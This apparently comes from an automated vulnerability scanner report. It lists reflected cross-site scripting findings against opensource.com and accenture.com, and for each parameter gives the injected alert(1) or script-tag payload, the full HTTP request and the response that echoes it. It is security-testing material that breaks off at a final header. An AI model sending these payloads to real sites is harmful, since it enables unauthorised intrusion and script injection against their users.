Date: Sun, 21 Nov 2010 18:09:16 GMT
Server: Apache
Set-Cookie: SESS1de3ab6551d6610cb7fc786137658853=1q1ubnusk38f0gl7vmlnq37m64; expires=Tue, 14-Dec-2010 21:42:36 GMT; path=/; domain=.opensource.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 21 Nov 2010 18:09:16 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22540
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head> <met ...[SNIP]... <!-- s.pageName="opensource|blocks404"; s.server=""; s.channel="opensource"; s.pageType=""; s.prop1=""; s.campaign=""; s.eVar1=""; s.eVar2=""; s.eVar3=""; s.eVar23="http://opensource.com/education/10d87f0"-alert(1)-"42d3f0ecc9f/11/three-unspoken-blockers-preventing-open-source-participation"; s.events=""; s.products=""; s.state=""; s.zip=""; s.purchaseID=""; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! ************ ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cada1"-alert(1)-"ddab8f1f4c6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /education/10/11cada1"-alert(1)-"ddab8f1f4c6/three-unspoken-blockers-preventing-open-source-participation HTTP/1.1
Host: opensource.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sun, 21 Nov 2010 18:09:24 GMT
Server: Apache
Set-Cookie: SESS1de3ab6551d6610cb7fc786137658853=dmbh5vkijghseefsmfk4jgg127; expires=Tue, 14-Dec-2010 21:42:44 GMT; path=/; domain=.opensource.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 21 Nov 2010 18:09:24 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22540
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head> <met ...[SNIP]... !-- s.pageName="opensource|blocks404"; s.server=""; s.channel="opensource"; s.pageType=""; s.prop1=""; s.campaign=""; s.eVar1=""; s.eVar2=""; s.eVar3=""; s.eVar23="http://opensource.com/education/10/11cada1"-alert(1)-"ddab8f1f4c6/three-unspoken-blockers-preventing-open-source-participation"; s.events=""; s.products=""; s.state=""; s.zip=""; s.purchaseID=""; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 118ea"-alert(1)-"e6e7e121cd3 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /education/10/11/three-unspoken-blockers-preventing-open-source-participation118ea"-alert(1)-"e6e7e121cd3 HTTP/1.1
Host: opensource.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sun, 21 Nov 2010 18:09:32 GMT
Server: Apache
Set-Cookie: SESS1de3ab6551d6610cb7fc786137658853=mmrp8cuki6bgac3rvbrkn1bkd2; expires=Tue, 14-Dec-2010 21:42:52 GMT; path=/; domain=.opensource.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 21 Nov 2010 18:09:32 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22540
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head> <met ...[SNIP]... ="opensource"; s.pageType=""; s.prop1=""; s.campaign=""; s.eVar1=""; s.eVar2=""; s.eVar3=""; s.eVar23="http://opensource.com/education/10/11/three-unspoken-blockers-preventing-open-source-participation118ea"-alert(1)-"e6e7e121cd3"; s.events=""; s.products=""; s.state=""; s.zip=""; s.purchaseID=""; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ //--> ...[SNIP]...
1.127. http://opensource.com/education/10/11/three-unspoken-blockers-preventing-open-source-participation [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9f7ca"-alert(1)-"b0c201e8db0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /education/10/11/three-unspoken-blockers-preventing-open-source-participation?9f7ca"-alert(1)-"b0c201e8db0=1 HTTP/1.1
Host: opensource.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 18:08:57 GMT
Server: Apache
Set-Cookie: SESS1de3ab6551d6610cb7fc786137658853=4m9kr84ic388b0m1la5a3sabd6; expires=Tue, 14-Dec-2010 21:42:17 GMT; path=/; domain=.opensource.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 21 Nov 2010 18:08:57 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 73176
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head> <met ...[SNIP]... "opensource"; s.pageType=""; s.prop1=""; s.campaign=""; s.eVar1=""; s.eVar2=""; s.eVar3=""; s.eVar23="http://opensource.com/education/10/11/three-unspoken-blockers-preventing-open-source-participation?9f7ca"-alert(1)-"b0c201e8db0=1"; s.events=""; s.products=""; s.state=""; s.zip=""; s.purchaseID=""; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ //--> ...[SNIP]...
The value of the client request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 11cca"><script>alert(1)</script>fc0af4dfab4 was submitted in the client parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /accenture/search/search.aspx?filter=1&getfields=*&ie=utf8&output=xml_no_dtd&client=accenture11cca"><script>alert(1)</script>fc0af4dfab4&lr=&oe=utf8&proxycustom=&site=main_locations&search_in=main&search_main=all&search_location_text=&original_location=&q= HTTP/1.1
Host: www.accenture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UrlTracker=ReferrerPageURL=EAN.aspx&Content=Thank you for updating your feature and newsletter subscriptions on accenture.com. <br/> Your current features are:&ThankYouPageTitle=Confirmation&ReferrerPageTitle=E-mail Alerts and Newsletters&ThankYouPageType=ean; Commerce2002_TestPersistentCookie=TestCookie; Commerce2002_TestSessionCookie=TestCookie; UserPref=Culture^en-US; FormSubmitURL=/Global/Registration/Accenture_Feedback_TY; MSCSProfile=B9CAF61F501232A3EE72991FDFC68CC405D4867ED45858AF0703C3FEDA7C1648E0D7976F6DAABFAF253FC9390B9B4A08EC215B53CDE54CF88D1B580F127CBD1D81340063F30B8FFEDC74F8161BCF11329C7D3B8498339A152118B951906347B01B9B3F1529B0DF9CE2A1E25128666629718AA404E0DE2E89D2C0735837A4915F;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Content-Type: text/html; charset=utf-8 Date: Sun, 21 Nov 2010 16:48:37 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: UserPref=Culture^en-US; expires=Mon, 21-Nov-2011 16:48:37 GMT; path=/ Cache-Control: no-cache Expires: -1 Pragma: cache Pragma: no-cache Content-Length: 67197
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML> <HEAD> <title> Search</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content=" ...[SNIP]... n-US&banner=3EFEDDE7-C822-466D-A267-A21C9A8123B3&topnav=66DB0E54-2B4B-43BE-88B3-476A9B560C03&footer=9E541954-D5F8-4EC6-AF22-9FF473A55D70&channel=&original_location=&searchmode=Advanced&client=accenture11cca"><script>alert(1)</script>fc0af4dfab4&filter=1&getfields=*&ie=utf8&oe=utf8&output=xml_no_dtd&search_in=main&site=main_locations&lr=&q=&num=&sort=" Id="SiteSearchControlStandard_lbtnBasicAdvancedLink" Title="Advanced Search" Class="searchb ...[SNIP]...
The value of the filter request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 146f3"><script>alert(1)</script>2ce8741c39d was submitted in the filter parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /accenture/search/search.aspx?filter=1146f3"><script>alert(1)</script>2ce8741c39d&getfields=*&ie=utf8&output=xml_no_dtd&client=accenture&lr=&oe=utf8&proxycustom=&site=main_locations&search_in=main&search_main=all&search_location_text=&original_location=&q= HTTP/1.1 Host: www.accenture.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UrlTracker=ReferrerPageURL=EAN.aspx&Content=Thank you for updating your feature and newsletter subscriptions on accenture.com. <br/> Your current features are:&ThankYouPageTitle=Confirmation&ReferrerPageTitle=E-mail Alerts and Newsletters&ThankYouPageType=ean; Commerce2002_TestPersistentCookie=TestCookie; Commerce2002_TestSessionCookie=TestCookie; UserPref=Culture^en-US; FormSubmitURL=/Global/Registration/Accenture_Feedback_TY; MSCSProfile=B9CAF61F501232A3EE72991FDFC68CC405D4867ED45858AF0703C3FEDA7C1648E0D7976F6DAABFAF253FC9390B9B4A08EC215B53CDE54CF88D1B580F127CBD1D81340063F30B8FFEDC74F8161BCF11329C7D3B8498339A152118B951906347B01B9B3F1529B0DF9CE2A1E25128666629718AA404E0DE2E89D2C0735837A4915F;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Content-Type: text/html; charset=utf-8 Date: Sun, 21 Nov 2010 16:48:33 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: UserPref=Culture^en-US; expires=Mon, 21-Nov-2011 16:48:32 GMT; path=/ Cache-Control: no-cache Expires: -1 Pragma: cache Pragma: no-cache Content-Length: 67197
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML> <HEAD> <title> Search</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content=" ...[SNIP]... er=3EFEDDE7-C822-466D-A267-A21C9A8123B3&topnav=66DB0E54-2B4B-43BE-88B3-476A9B560C03&footer=9E541954-D5F8-4EC6-AF22-9FF473A55D70&channel=&original_location=&searchmode=Advanced&client=accenture&filter=1146f3"><script>alert(1)</script>2ce8741c39d&getfields=*&ie=utf8&oe=utf8&output=xml_no_dtd&search_in=main&site=main_locations&lr=&q=&num=&sort=" Id="SiteSearchControlStandard_lbtnBasicAdvancedLink" Title="Advanced Search" Class="searchbod" > ...[SNIP]...
The value of the getfields request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 211ce"><script>alert(1)</script>d579d659514 was submitted in the getfields parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /accenture/search/search.aspx?filter=1&getfields=*211ce"><script>alert(1)</script>d579d659514&ie=utf8&output=xml_no_dtd&client=accenture&lr=&oe=utf8&proxycustom=&site=main_locations&search_in=main&search_main=all&search_location_text=&original_location=&q= HTTP/1.1 Host: www.accenture.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UrlTracker=ReferrerPageURL=EAN.aspx&Content=Thank you for updating your feature and newsletter subscriptions on accenture.com. <br/> Your current features are:&ThankYouPageTitle=Confirmation&ReferrerPageTitle=E-mail Alerts and Newsletters&ThankYouPageType=ean; Commerce2002_TestPersistentCookie=TestCookie; Commerce2002_TestSessionCookie=TestCookie; UserPref=Culture^en-US; FormSubmitURL=/Global/Registration/Accenture_Feedback_TY; MSCSProfile=B9CAF61F501232A3EE72991FDFC68CC405D4867ED45858AF0703C3FEDA7C1648E0D7976F6DAABFAF253FC9390B9B4A08EC215B53CDE54CF88D1B580F127CBD1D81340063F30B8FFEDC74F8161BCF11329C7D3B8498339A152118B951906347B01B9B3F1529B0DF9CE2A1E25128666629718AA404E0DE2E89D2C0735837A4915F;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Content-Type: text/html; charset=utf-8 Date: Sun, 21 Nov 2010 16:48:34 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: UserPref=Culture^en-US; expires=Mon, 21-Nov-2011 16:48:33 GMT; path=/ Cache-Control: no-cache Expires: -1 Pragma: cache Pragma: no-cache Content-Length: 67196
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML> <HEAD> <title> Search</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content=" ...[SNIP]... C822-466D-A267-A21C9A8123B3&topnav=66DB0E54-2B4B-43BE-88B3-476A9B560C03&footer=9E541954-D5F8-4EC6-AF22-9FF473A55D70&channel=&original_location=&searchmode=Advanced&client=accenture&filter=1&getfields=*211ce"><script>alert(1)</script>d579d659514&ie=utf8&oe=utf8&output=xml_no_dtd&search_in=main&site=main_locations&lr=&q=&num=&sort=" Id="SiteSearchControlStandard_lbtnBasicAdvancedLink" Title="Advanced Search" Class="searchbod" > ...[SNIP]...
The value of the ie request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5302b"><script>alert(1)</script>4aa0ca64ae9 was submitted in the ie parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /accenture/search/search.aspx?filter=1&getfields=*&ie=utf85302b"><script>alert(1)</script>4aa0ca64ae9&output=xml_no_dtd&client=accenture&lr=&oe=utf8&proxycustom=&site=main_locations&search_in=main&search_main=all&search_location_text=&original_location=&q= HTTP/1.1 Host: www.accenture.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UrlTracker=ReferrerPageURL=EAN.aspx&Content=Thank you for updating your feature and newsletter subscriptions on accenture.com. <br/> Your current features are:&ThankYouPageTitle=Confirmation&ReferrerPageTitle=E-mail Alerts and Newsletters&ThankYouPageType=ean; Commerce2002_TestPersistentCookie=TestCookie; Commerce2002_TestSessionCookie=TestCookie; UserPref=Culture^en-US; FormSubmitURL=/Global/Registration/Accenture_Feedback_TY; MSCSProfile=B9CAF61F501232A3EE72991FDFC68CC405D4867ED45858AF0703C3FEDA7C1648E0D7976F6DAABFAF253FC9390B9B4A08EC215B53CDE54CF88D1B580F127CBD1D81340063F30B8FFEDC74F8161BCF11329C7D3B8498339A152118B951906347B01B9B3F1529B0DF9CE2A1E25128666629718AA404E0DE2E89D2C0735837A4915F;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Content-Type: text/html; charset=utf-8 Date: Sun, 21 Nov 2010 16:48:35 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: UserPref=Culture^en-US; expires=Mon, 21-Nov-2011 16:48:35 GMT; path=/ Cache-Control: no-cache Expires: -1 Pragma: cache Pragma: no-cache Content-Length: 67196
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML> <HEAD> <title> Search</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content=" ...[SNIP]... D-A267-A21C9A8123B3&topnav=66DB0E54-2B4B-43BE-88B3-476A9B560C03&footer=9E541954-D5F8-4EC6-AF22-9FF473A55D70&channel=&original_location=&searchmode=Advanced&client=accenture&filter=1&getfields=*&ie=utf85302b"><script>alert(1)</script>4aa0ca64ae9&oe=utf8&output=xml_no_dtd&search_in=main&site=main_locations&lr=&q=&num=&sort=" Id="SiteSearchControlStandard_lbtnBasicAdvancedLink" Title="Advanced Search" Class="searchbod" > ...[SNIP]...
The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41a4d"><script>alert(1)</script>ca532dd932b was submitted in the lr parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /accenture/search/search.aspx?filter=1&getfields=*&ie=utf8&output=xml_no_dtd&client=accenture&lr=41a4d"><script>alert(1)</script>ca532dd932b&oe=utf8&proxycustom=&site=main_locations&search_in=main&search_main=all&search_location_text=&original_location=&q= HTTP/1.1 Host: www.accenture.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UrlTracker=ReferrerPageURL=EAN.aspx&Content=Thank you for updating your feature and newsletter subscriptions on accenture.com. <br/> Your current features are:&ThankYouPageTitle=Confirmation&ReferrerPageTitle=E-mail Alerts and Newsletters&ThankYouPageType=ean; Commerce2002_TestPersistentCookie=TestCookie; Commerce2002_TestSessionCookie=TestCookie; UserPref=Culture^en-US; FormSubmitURL=/Global/Registration/Accenture_Feedback_TY; MSCSProfile=B9CAF61F501232A3EE72991FDFC68CC405D4867ED45858AF0703C3FEDA7C1648E0D7976F6DAABFAF253FC9390B9B4A08EC215B53CDE54CF88D1B580F127CBD1D81340063F30B8FFEDC74F8161BCF11329C7D3B8498339A152118B951906347B01B9B3F1529B0DF9CE2A1E25128666629718AA404E0DE2E89D2C0735837A4915F;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Content-Type: text/html; charset=utf-8 Date: Sun, 21 Nov 2010 16:48:38 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: UserPref=Culture^en-US; expires=Mon, 21-Nov-2011 16:48:37 GMT; path=/ Cache-Control: no-cache Expires: -1 Pragma: cache Pragma: no-cache Content-Length: 67197
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML> <HEAD> <title> Search</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content=" ...[SNIP]... ooter=9E541954-D5F8-4EC6-AF22-9FF473A55D70&channel=&original_location=&searchmode=Advanced&client=accenture&filter=1&getfields=*&ie=utf8&oe=utf8&output=xml_no_dtd&search_in=main&site=main_locations&lr=41a4d"><script>alert(1)</script>ca532dd932b&q=&num=&sort=" Id="SiteSearchControlStandard_lbtnBasicAdvancedLink" Title="Advanced Search" Class="searchbod" > ...[SNIP]...
The value of the oe request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload adbc3"><script>alert(1)</script>6f380d9deb9 was submitted in the oe parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /accenture/search/search.aspx?filter=1&getfields=*&ie=utf8&output=xml_no_dtd&client=accenture&lr=&oe=utf8adbc3"><script>alert(1)</script>6f380d9deb9&proxycustom=&site=main_locations&search_in=main&search_main=all&search_location_text=&original_location=&q= HTTP/1.1 Host: www.accenture.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UrlTracker=ReferrerPageURL=EAN.aspx&Content=Thank you for updating your feature and newsletter subscriptions on accenture.com. <br/> Your current features are:&ThankYouPageTitle=Confirmation&ReferrerPageTitle=E-mail Alerts and Newsletters&ThankYouPageType=ean; Commerce2002_TestPersistentCookie=TestCookie; Commerce2002_TestSessionCookie=TestCookie; UserPref=Culture^en-US; FormSubmitURL=/Global/Registration/Accenture_Feedback_TY; MSCSProfile=B9CAF61F501232A3EE72991FDFC68CC405D4867ED45858AF0703C3FEDA7C1648E0D7976F6DAABFAF253FC9390B9B4A08EC215B53CDE54CF88D1B580F127CBD1D81340063F30B8FFEDC74F8161BCF11329C7D3B8498339A152118B951906347B01B9B3F1529B0DF9CE2A1E25128666629718AA404E0DE2E89D2C0735837A4915F;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Content-Type: text/html; charset=utf-8 Date: Sun, 21 Nov 2010 16:48:39 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: UserPref=Culture^en-US; expires=Mon, 21-Nov-2011 16:48:38 GMT; path=/ Cache-Control: no-cache Expires: -1 Pragma: cache Pragma: no-cache Content-Length: 67198
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML> <HEAD> <title> Search</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content=" ...[SNIP]... 21C9A8123B3&topnav=66DB0E54-2B4B-43BE-88B3-476A9B560C03&footer=9E541954-D5F8-4EC6-AF22-9FF473A55D70&channel=&original_location=&searchmode=Advanced&client=accenture&filter=1&getfields=*&ie=utf8&oe=utf8adbc3"><script>alert(1)</script>6f380d9deb9&output=xml_no_dtd&search_in=main&site=main_locations&lr=&q=&num=&sort=" Id="SiteSearchControlStandard_lbtnBasicAdvancedLink" Title="Advanced Search" Class="searchbod" > ...[SNIP]...
The value of the output request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b150"><script>alert(1)</script>a28362fa3c1 was submitted in the output parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /accenture/search/search.aspx?filter=1&getfields=*&ie=utf8&output=xml_no_dtd8b150"><script>alert(1)</script>a28362fa3c1&client=accenture&lr=&oe=utf8&proxycustom=&site=main_locations&search_in=main&search_main=all&search_location_text=&original_location=&q= HTTP/1.1 Host: www.accenture.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UrlTracker=ReferrerPageURL=EAN.aspx&Content=Thank you for updating your feature and newsletter subscriptions on accenture.com. <br/> Your current features are:&ThankYouPageTitle=Confirmation&ReferrerPageTitle=E-mail Alerts and Newsletters&ThankYouPageType=ean; Commerce2002_TestPersistentCookie=TestCookie; Commerce2002_TestSessionCookie=TestCookie; UserPref=Culture^en-US; FormSubmitURL=/Global/Registration/Accenture_Feedback_TY; MSCSProfile=B9CAF61F501232A3EE72991FDFC68CC405D4867ED45858AF0703C3FEDA7C1648E0D7976F6DAABFAF253FC9390B9B4A08EC215B53CDE54CF88D1B580F127CBD1D81340063F30B8FFEDC74F8161BCF11329C7D3B8498339A152118B951906347B01B9B3F1529B0DF9CE2A1E25128666629718AA404E0DE2E89D2C0735837A4915F;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Content-Type: text/html; charset=utf-8 Date: Sun, 21 Nov 2010 16:48:36 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: UserPref=Culture^en-US; expires=Mon, 21-Nov-2011 16:48:35 GMT; path=/ Cache-Control: no-cache Expires: -1 Pragma: cache Pragma: no-cache Content-Length: 67198
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML> <HEAD> <title> Search</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content=" ...[SNIP]... =66DB0E54-2B4B-43BE-88B3-476A9B560C03&footer=9E541954-D5F8-4EC6-AF22-9FF473A55D70&channel=&original_location=&searchmode=Advanced&client=accenture&filter=1&getfields=*&ie=utf8&oe=utf8&output=xml_no_dtd8b150"><script>alert(1)</script>a28362fa3c1&search_in=main&site=main_locations&lr=&q=&num=&sort=" Id="SiteSearchControlStandard_lbtnBasicAdvancedLink" Title="Advanced Search" Class="searchbod" > ...[SNIP]...
The value of the search_in request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a86ff"><script>alert(1)</script>74b31afde1a was submitted in the search_in parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /accenture/search/search.aspx?filter=1&getfields=*&ie=utf8&output=xml_no_dtd&client=accenture&lr=&oe=utf8&proxycustom=&site=main_locations&search_in=maina86ff"><script>alert(1)</script>74b31afde1a&search_main=all&search_location_text=&original_location=&q= HTTP/1.1 Host: www.accenture.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UrlTracker=ReferrerPageURL=EAN.aspx&Content=Thank you for updating your feature and newsletter subscriptions on accenture.com. <br/> Your current features are:&ThankYouPageTitle=Confirmation&ReferrerPageTitle=E-mail Alerts and Newsletters&ThankYouPageType=ean; Commerce2002_TestPersistentCookie=TestCookie; Commerce2002_TestSessionCookie=TestCookie; UserPref=Culture^en-US; FormSubmitURL=/Global/Registration/Accenture_Feedback_TY; MSCSProfile=B9CAF61F501232A3EE72991FDFC68CC405D4867ED45858AF0703C3FEDA7C1648E0D7976F6DAABFAF253FC9390B9B4A08EC215B53CDE54CF88D1B580F127CBD1D81340063F30B8FFEDC74F8161BCF11329C7D3B8498339A152118B951906347B01B9B3F1529B0DF9CE2A1E25128666629718AA404E0DE2E89D2C0735837A4915F;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Content-Type: text/html; charset=utf-8 Date: Sun, 21 Nov 2010 16:48:45 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: UserPref=Culture^en-US; expires=Mon, 21-Nov-2011 16:48:44 GMT; path=/ Cache-Control: no-cache Expires: -1 Pragma: cache Pragma: no-cache Content-Length: 67198
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML> <HEAD> <title> Search</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content=" ...[SNIP]... 43BE-88B3-476A9B560C03&footer=9E541954-D5F8-4EC6-AF22-9FF473A55D70&channel=&original_location=&searchmode=Advanced&client=accenture&filter=1&getfields=*&ie=utf8&oe=utf8&output=xml_no_dtd&search_in=maina86ff"><script>alert(1)</script>74b31afde1a&site=main_locations&lr=&q=&num=&sort=" Id="SiteSearchControlStandard_lbtnBasicAdvancedLink" Title="Advanced Search" Class="searchbod" > ...[SNIP]...
The value of the site request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 522c2"><script>alert(1)</script>af5239f4278 was submitted in the site parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /accenture/search/search.aspx?filter=1&getfields=*&ie=utf8&output=xml_no_dtd&client=accenture&lr=&oe=utf8&proxycustom=&site=main_locations522c2"><script>alert(1)</script>af5239f4278&search_in=main&search_main=all&search_location_text=&original_location=&q= HTTP/1.1 Host: www.accenture.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UrlTracker=ReferrerPageURL=EAN.aspx&Content=Thank you for updating your feature and newsletter subscriptions on accenture.com. <br/> Your current features are:&ThankYouPageTitle=Confirmation&ReferrerPageTitle=E-mail Alerts and Newsletters&ThankYouPageType=ean; Commerce2002_TestPersistentCookie=TestCookie; Commerce2002_TestSessionCookie=TestCookie; UserPref=Culture^en-US; FormSubmitURL=/Global/Registration/Accenture_Feedback_TY; MSCSProfile=B9CAF61F501232A3EE72991FDFC68CC405D4867ED45858AF0703C3FEDA7C1648E0D7976F6DAABFAF253FC9390B9B4A08EC215B53CDE54CF88D1B580F127CBD1D81340063F30B8FFEDC74F8161BCF11329C7D3B8498339A152118B951906347B01B9B3F1529B0DF9CE2A1E25128666629718AA404E0DE2E89D2C0735837A4915F;
Response
